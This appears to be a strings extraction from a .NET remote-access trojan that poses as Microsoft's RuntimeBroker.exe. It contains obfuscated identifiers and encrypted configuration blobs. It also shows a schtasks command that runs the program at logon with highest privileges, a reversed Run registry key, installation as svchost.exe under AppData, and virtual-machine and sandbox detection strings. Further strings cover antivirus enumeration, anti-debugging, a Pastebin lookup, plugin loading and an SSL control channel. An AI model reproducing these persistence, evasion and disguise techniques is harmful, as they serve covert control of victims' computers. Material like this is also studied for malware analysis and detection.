!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
qzSWbykcNA
SNoObfzMsOMJTA
yGpWMSMoqUA
lZyLbWXfiHVA
KMTSXcyARCTdVA
zDersxJMHWTiA
URdOfuwXFYHB
fYpWhNhJkJB
LSijDCZzFQQB
znyXdRNYrTcB
ETkiGkPHEdB
NZahgBcgayIjB
UIPbutQuVjrVGlB
zNlUGqcdHCvB
YUzHvfhCBLC
QCRAezMRcXLRC
xFhJTMoqDSC
kjMLFVMlFDQSC
JuxYLzwDQpekC
ZsZemxFqoC
eLkmXHTbDTAsC
ZDLMKmoOriApzvC
XmNfBJbgVjxC
XDZhzeVrgABiMyC
MapNameToOID
get_FormatID
oeEsrpyILMD
xzOKmIuTQXZaWJUD
IsZjcvAHZD
XKAiMkdyYaD
DIpUDgSgqQfD
RYWQkeYVHQrMFiD
XtNzEhnevkD
pneyCfZFJHtkIlD
rIeCvVuyGgnD
qDSmiqQVnFRWuD
YtvFDrCJQRTmwhuD
gfcQLTzVhqDMhWVaGE
ebaBJDQVzQLE
nyvnTlERldqclSE
rjFHmvHcFUAoE
XqwwhZeaRJpE
vNluRpcwxE
YawfPdZFLF
TIGLXshQUKjLF
vrJPHKBhwNQF
AgmpvDYrOCjQQF
WejxYtGnmUF
mrsJUpUrvF
RxImvNriMshbG
awUuSBqwCIXWOfG
GHMBZRzXzHzG
fyMaarlOFcsAH
NqsdKWSYaoCH
tvryjQVQAIYxXKH
ZoSRSanqzeLH
PnVtOFfOarHWsfH
aKOXDdnEBzCI
get_ASCII
cTMDENoovJKUII
OhFPUhWavFruBJI
cxYUtTCLduUI
dgshIbkkrKmDnvgI
zzyfHBwgDGJ
byKHDdlaKJ
wYucxkPlUNJ
BmNCroHEIRJ
nbvbEzpUSCYrFzNiQjJ
XWcFQfKmQjwJ
jEsQKrRcHsEK
jaWhgMuvrSK
EcYPiaWfNjpJXlK
UWkidKWSzrK
KpOzQMVJitK
LneWmwjPIFeEL
vMJeHUtyXkJL
ylqfTnecnhlIOL
SliEePMbwfPL
xQAeBIDpvbWhVL
dwzSwebSfJVIWL
tsHQqgHcDVcsZL
OronVyXkKFQERrdL
CHqoHchxliL
hoYqdnxjOnqL
DtJBeisITJtL
MWpMEWtHRM
kdrHIzIKTriftSM
UYmuRnoDwRqpM
bLHhgjLgvBN
fdBtIqqzEN
WpQeSJARBMN
HVcRAyPiqWnPN
YxFoHhZIJTN
yFuCmnLOFVN
YWhpTpJdyVjN
hPWOYotnOpN
yUNFkXIuzSIZHO
System.IO
JRQJLWZVrRKJO
crmXTlThZivuNO
WzdJqTRZybO
wkXsgLSMhXglO
scwkVKoGxoO
HHaQKGMYENDrO
EpVMVTkKyYwO
wKRBBqkmGxO
yndsEjgqhAP
EspcSsFKcCLP
tweEPPcLZGnOP
MNZvJtddyvWP
pBPBydmidYhsXciP
iDNdcOnMeXtP
ZZRGLhFWmIQ
VihuXKlBzPqEQQ
QoPgGtdOpebezQQ
qhruXjGkTQ
CZYQRgFEDWQ
rcbYQcoVQbQ
gKrTxxbsHJlQ
wnNRXkpmssQ
KDVpqzETNMHR
EXFhTVZPOwtYHR
mjrCALFMJbjR
ydReCOSjoR
DghaSXzZjJkoR
ndlZRxnHwR
MCQTVEqopKRCS
XJbjHmgeXdFS
jraywTvoTMS
qXyqalJHsONS
mJxoDwIpSRUS
BuqVWQvXDHUfS
kebGHipzjLAFqXCT
ohrNpdgHedT
WpVqPZKOoSyggT
hKgJFhrinT
pfxBfoDMawT
WIkAZiiMChxT
BnnoTVmHGBU
RVgTRATdJU
FfXmRYBTCFjOU
aUkMQcZysbRU
oXaEaPUvYuNmU
bWCEkPczdTqU
SsnhHTPpzCrU
SFIlnhtKsU
ITzphiAyxU
get_IV
set_IV
GenerateIV
HEbeNgSazcniKPV
waBzHsoXNZV
DdQbVpDifdV
YEZmPDrnEiPRvV
vNQcuCSQUSW
icCPMkzpiW
MZiGxkhVCLjW
UrMdoPnFlmW
BkeJMXJLDdWNrW
GllCrqDtcsW
NmiNvGAdPX
NAWrDojeDtzRX
IoPpeskFVVFTjX
hgTeWOXQbSnX
TJlNHJimVrX
tDpmfVqRIrzTdsX
UbOyLciTGDY
dMHLJfiXiHjY
EhGBWqgKGKVxY
vEdTSKXvkCZ
KtyZhAPtDZ
nJYHiPalnglRZ
PyhjksYfWTaZ
gvRMUBllQjjcZ
AfErYIkkmtnZ
xArbDUioKnqZ
value__
QkbWdIBNStwLa
GNWHViXTIMRSKWa
XBVbhNxCTMxa
jwsDpdoSOjGb
aHlpACORAIb
VvzIsQWdbGdKb
FYUgJJjkWhb
mscorlib
SmGEGKuunzoob
wBarDyhycjzb
QKWSmJvrzb
JviHjdvzUc
cEcqALUlgRlVc
qdyiqNsZbBic
System.Collections.Generic
Microsoft.VisualBasic
ywTwnVfvVUmc
QHZIBwfGemc
yVCyOThzHhjdymc
get_SendSync
YNQdcMyRTLVDd
mEVEBiUvDd
hkfTGZocVHd
XmpupSwDrwBTKd
yuOndYtLxLd
prQFICohvmWd
EndRead
BeginRead
Thread
kfbtUaMHHcbd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
bRHfckxsyqtd
GTyQPVoNHud
htPzmRojXQxd
emoPYBCdQNzd
iYSYmNtqbKCe
ATzsspMAQgRjGe
pLypKnppHe
YIXRCkpfjFLe
evucLfqdfMLe
bZoWnBaJNLe
zowWLKNdWXlQe
BXdIzyntTe
ScZlfMSIGUe
XcUfxmtTMGXe
ZLrpTMLGchMZce
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
Invoke
oTEhvYXBle
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
jcvCaSWANnoe
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
sXZLnErDawkue
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
xMstwwDxZzumhvxe
IFlvnlCMize
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
alFHzUAqkqPcBf
VWsvvMlbjFf
qhSIkawrjnLf
hHKLWbjzqZMETdwLf
OKaROyyefpSf
KbUqBdhoTNbf
QJiuwBYuZywef
AdrdtIyoff
NzFlWGkadkf
BncISwEuCycnf
PkhutlICupf
VAsAFbhCkYyrqf
kjxfWAsaXaZyAg
QBuPZczLaMOBg
JSdulVRqiDg
pisQZSFBfbgARg
jEpKDYxvKLSg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
XJgRXMSHvuwmsg
RriRAbnXFffamxg
BnCgYsDdyg
yJQZXQWVRh
PBITYHaHEfRh
KMEmnSuUEWJUh
YojQOLJKch
IYDeaGLHtvmh
ComputeHash
VerifyHash
QcMUZLvoFqzsh
get_ExecutablePath
GetTempPath
get_Length
NkcvdLcbWhSPDi
XahtkbWGmRDLLBbKi
sdKCbPohmzMi
usCZMVOpSgoZi
oAMsZUfici
ansGEhIlJKgi
brCrYltDXkvfqi
jxWnUDPBVsi
fkZpBFdXyTJj
LYnZIsKrhLOj
nHYDkEsUFRj
lxFetquCCOsBYZj
PthoyqMlOPfj
CuRzqjPogaWIgj
QllvTSHbyjhj
xJOneyrVlj
qaweauazBPqj
sgcUgUBWkBak
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
icKoNxWzcbok
NAtsRQiEhpCl
HDvNEzccPifNl
uQYXGmZyrqqVl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
vkGGZhBzll
ekQPIDLFkfspl
NJnYELewceEm
DTRvORQwFNm
tHXbVLAjYMTVm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
YbPJsRbuFcAqm
ICryptoTransform
AmFHpEREtm
cdhwpdpVsym
GJsvPZjBxxCn
tcxFLbxvUIexIn
KGtrnwqycNhqOn
CCdDsyjfZQWnGan
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
CarcpBvQPln
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
RzzGmEWeQNo
eveumAePldo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
kPLKFmHervo
nafiWLmpSp
mhhTpFVQqcJUcp
Microsoft.CSharp
wwWfORRMByTqCTq
FuYzBQEPLaUq
System.Linq
IphTiwMEifiTr
WUEGcgzLsbr
vYQNYcvcugTer
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ggHTkBIRQCioer
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
vKiPAjWaMxpsBgr
WFGyQcgQUREbir
MCgeFAwGGgmr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
PhLbgqWabFvr
fttoQBYNaCRAs
nPzjeBLTChzgSdSIs
aemSClhBIzqFVNs
tGrWYomFICas
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
IqVuKkvhRts
System.Net.Sockets
set_Arguments
SystemEvents
Exists
ozBQPhnbmws
ncWujOFXsUIt
MAfvQjFQjBrTt
FBsejrFcUKZt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
eTLTKrtjfet
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
xgUiwSImhdht
qsGEdctZIITUjt
IAsyncResult
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
TCKLyzlLRiqt
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
hHnFtEgdETuKAu
EojymGRnGu
qTPrwIIiZIu
LqphliSEKu
krxvmjmBRGKymbu
DvFwqoMFpVMAHeu
dNqEqbYQJv
RAMgNEyDvXRLv
AICzzErbnUNv
UCzztElOUWv
GyzdpKxJePlWLw
mArFqbfwHrkeWw
UtvOolKeWaw
FOmlEkWlIebDuhw
GetForegroundWindow
set_CreateNoWindow
YoztlrDHXibqw
ntLBsDJdGUSBx
QhFipkFBNx
tnAehNOlDddNOx
NYfpOSMDCjOx
IafMsXCzGiZx
ZyGdyBhpUax
JWIKFuSybx
BxGJbNXRnucx
TFFWGHjcOorjx
PdONclIUAKvPvx
bYBYNnXxhdVlEy
EpVaKZnuJZGy
InitializeArray
ToArray
get_AsArray
CCsJoKzeLcy
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
BRpzuiWkeKVSAz
zrrDxRYylmGz
UguFpBLsxEcmKz
IEedcHqMfz
ZnoaIKkeVQxz
CdskckvMbAyz
JimGuiFgzz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
SHA256
aypXubTeUjqPUYRyGJzON5l6bgDz38kRnZ5egK287eoaTXhIYyYxaHq4ePzHUnZ6VrRJwkqVtQeRoaTJUCN0Q3KhtlKyTuLJxCgkd0T8qpw=
xGAe2pl0VpM/flF+GhglJ+TJvFWTK2iTnn1Ye7WOHzA3Gs61kiiS2VhMB609uU+izuMZvfG32Of/wEe+L8VJ6SNlc6veKFHnnbjWmSedPo3/uwvbjS7OR3fDLdCQH62x
d4O4sdPFujwGI79jPWP4DjwAYkr+NoQD5KFyOAG0qL0vX5fk1V7TbOI1tZyzlBxhHh01xX3I8btnaud/mswAjQ==
DUGaCaFu/sy+2SG7NGW9W/DZ+d6G5tZ4peasDvXjE6FaqFxKqNWJPui7/S/5pNCCxJ8e39cIJliKwQtlYphZRA==
%AppData%
svchost.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Runtime Broker
FileVersion
6.2.19041.746
InternalName
RuntimeBroker.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
RuntimeBroker.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
6.2.19041.746
Assembly Version
6.2.19041.746